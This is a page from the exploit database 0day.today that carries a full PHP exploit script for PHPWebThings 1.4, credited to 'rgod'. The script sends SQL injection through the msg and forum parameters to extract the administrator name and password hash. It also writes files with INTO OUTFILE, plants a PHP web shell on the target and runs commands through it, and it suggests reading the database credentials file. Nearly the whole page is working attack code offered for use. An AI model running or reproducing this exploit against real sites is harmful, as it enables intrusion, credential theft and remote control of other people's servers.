0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit
[=====================================================
PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit
=====================================================
<?php
# ---phpwebth14_xpl.php 10.47 16/11/2005 #
# #
# PHPWebThings 1.4 "msg" and "forum" SQL injection / Administrative #
# credentials disclosure and remote commands execution #
# #
# coded by rgod #
# #
# based on http://secunia.com/advisories/17410/, but here we have a more #
# chritical injection in msg parameter that works with magic_quotes_gpc on) #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-Tzu:"He wins his battles by making no mistakes. Making no mistakes is #
# what establishes the certainty of victory, for it means conquering an enemy #
# that is already defeated."
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> PHPWebThings 1.4 "msg" and "forum" SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
PHPWebThings 1.4 "msg" and "forum" SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value&action=value&fullpath=value&table_prefix=value"><p>
<input type="text" name="host"><span class="Stile5"> * hostname (ex: www.sitena
me.com) </span> </p> <p> <input type="text" name="path"> <span class="Stile5">
* path ( ex: /phpwebthings/ or just / ) </span></p> <p> <input type="text"
name="action"> <span class="Stile5"> * action: HASH to see admin username and
MD5 password hash, CMD to launch commands, PATH to disclose full application
path </span></p><p> <input type="text" name="fullpath"> <span class="Stile5">
full path to www, need this for "INTO OUTFILE" statements (ex.: C:\\\www\\\sit
e\\\, /www/site/, or with backslashes from MySQL data directory: ../../www/site/
)</span></p><p><input type="text" name="command"> <span class="Stile5"> specify
a command, cat wt_config.php to see database username & password</span></p> <p>
<input type="text" name="table_prefix"> <span class="Stile5"> specify a table
prefix other than the default (wt_)</span></p><p><input type="text" name="port">
<span class="Stile5">specify a port other than 80 ( default value ) </span>
</p> <p> <input type="text" name="proxy"> <span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td> </tr> </table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbps;&nbps;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($host<>'') and ($path<>'') and ($action<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($table_prefix=='') {$table_prefix="wt_";}
$action=strtoupper($action);
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$fullpath=str_replace("\r\n","",$fullpath);
$table_prefix=str_replace("\r\n","",$table_prefix);
if ($action=="HASH")
{
#STEP 1 - This works with magic_quotes_gpc both on or off (great... ;) ) and exploits the vulnerability in
# [path_to_phpwb]/modules/forum/split.php
#STEP 1A -> Retrieve admin username from database...
$SQL="-999 UNION SELECT 0,0,0,0,0,name,0,0,0,0,0,0,0,0 FROM ".$table_prefix."users WHERE uid=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=explode('name="subname" value="',$html);
$temp2=explode('"',$temp[1]);
$NAME=$temp2[0];
#STEP 1B -> Retrieve MD5 admin password hash from database...
$SQL="-999 UNION SELECT 0,0,0,0,0,password,0,0,0,0,0,0,0,0 FROM ".$table_prefix."users WHERE uid=1/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=explode('name="subname" value="',$html);
$temp2=explode('"',$temp[1]);
$HASH=$temp2[0];
echo "NAME ->".htmlentities($NAME)."<br>";
echo "HASH ->".htmlentities($HASH)."<br>";
if ($HASH<>'') {echo "Exploit succeeded...";
die;
}
else {echo "Exploit failed... trying next step...<BR>"; }
#STEP 2 -> Try blind injection and save data into output files... this works with magic quotes off
# and exploits the vulnerability in [path_to_phpwb]/forum.php
# we have only an int() as table value so we have to encode username and hash
# as integers in a lot of files
#STEP 2A -> Retrieve admin username fro database...
if ($fullpath<>'')
{
for ($z=1; $z<=20; $z++)
{
$SQL='';
$SQL[$z]="-999 UNION SELECT ORD(SUBSTRING(name,".$z.",1)) INTO OUTFILE '".$fullpath."keepU".$z."'FROM ".$table_prefix."users WHERE uid=1";
$SQL[$z]=urlencode($SQL[$z]);
$packet="GET ".$p."forum.php?act=markread&forum=".$SQL[$z]." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$NAME='';
for ($z=1; $z<=20; $z++)
{
$packet="GET ".$p."keepU".$z." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (!eregi('200 OK',$html)) {break;}
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$temp2=explode(chr(0x0a),$temp[1]);
$NAME.=chr($temp2[0]);
}
#STEP 2B -> MD5 admin password hash from database...
for ($z=1; $z<=32; $z++)
{
$SQL='';
$SQL[$z]="-999 UNION SELECT ORD(SUBSTRING(password,".$z.",1)) INTO OUTFILE '".$fullpath."keep".$z."'FROM ".$table_prefix."users WHERE uid=1";
$SQL[$z]=urlencode($SQL[$z]);
$packet="GET ".$p."forum.php?act=markread&forum=".$SQL[$z]." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
$HASH='';
for ($z=1; $z<=32; $z++)
{
$packet="GET ".$p."keep".$z." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (!eregi('200 OK',$html)) {break;}
$temp=explode(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html);
$temp2=explode(chr(0x0a),$temp[1]);
$HASH.=chr($temp2[0]);
}
echo "<br> NAME ->".htmlentities($NAME);
echo "<br> HASH ->".htmlentities($HASH);
}
else
{echo "<BR>You need to specify a full application path for STEP 2..."; die;}
}
else
if ($action=="CMD")
{
#STEP X -> Inject a shell, this works with magic_quotes_gpc off
#Note: we could encode shell as an array of chars but
# real problem is that you have to specify output filename literally
# so you are forced to use quotes
# you should specify a full path for shell.php
#ex: /www/site/
# c:\\www\\site\\ (this on windows)
#or with backslashes (from Mysql data directory):
# ../../www/phpwebthings/
#you can disclose the path manually, ex:
#
#http://[target]/[path_to_phpwebthings/sideboxes/counter.php
#http://[target]/[path_to_phpwebthings/sideboxes/lastvisit.php
#if not specified we try to see theese urls...
if (($command<>'') and ($fullpath<>''))
{
$SHELL=":)<?php error_reporting(0);ini_set(\"max_execution_time\",0);system(\$_GET[cmd]);?>";
$SQL="-999 UNION SELECT 0,0,0,0,0,'".$SHELL."',0,0,0,0,0,0,0,0 INTO OUTFILE '".$fullpath."suntzu.php' FROM ".$table_prefix."users/*";
$SQL=urlencode($SQL);
$packet="GET ".$p."forum.php?act=split&msg=".$SQL."&forum=1 HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi(':)',$html)) {echo "Exploit succeded...";}
else {echo "Exploit failed...";}
}
else {echo "Specify a command and full application path for CMD action..."; die;}
}
else
if ($action=="PATH")
{
$packet="GET ".$p."sideboxes/counter.php HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$packet="GET ".$p."sideboxes/lastvisit.php HTTP/1.1\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
else
{echo "Specify an action..."; }
}
else
{echo 'Specify * required fields, optionally specify a proxy...';}
?>
# 0day.today [2024-11-15] #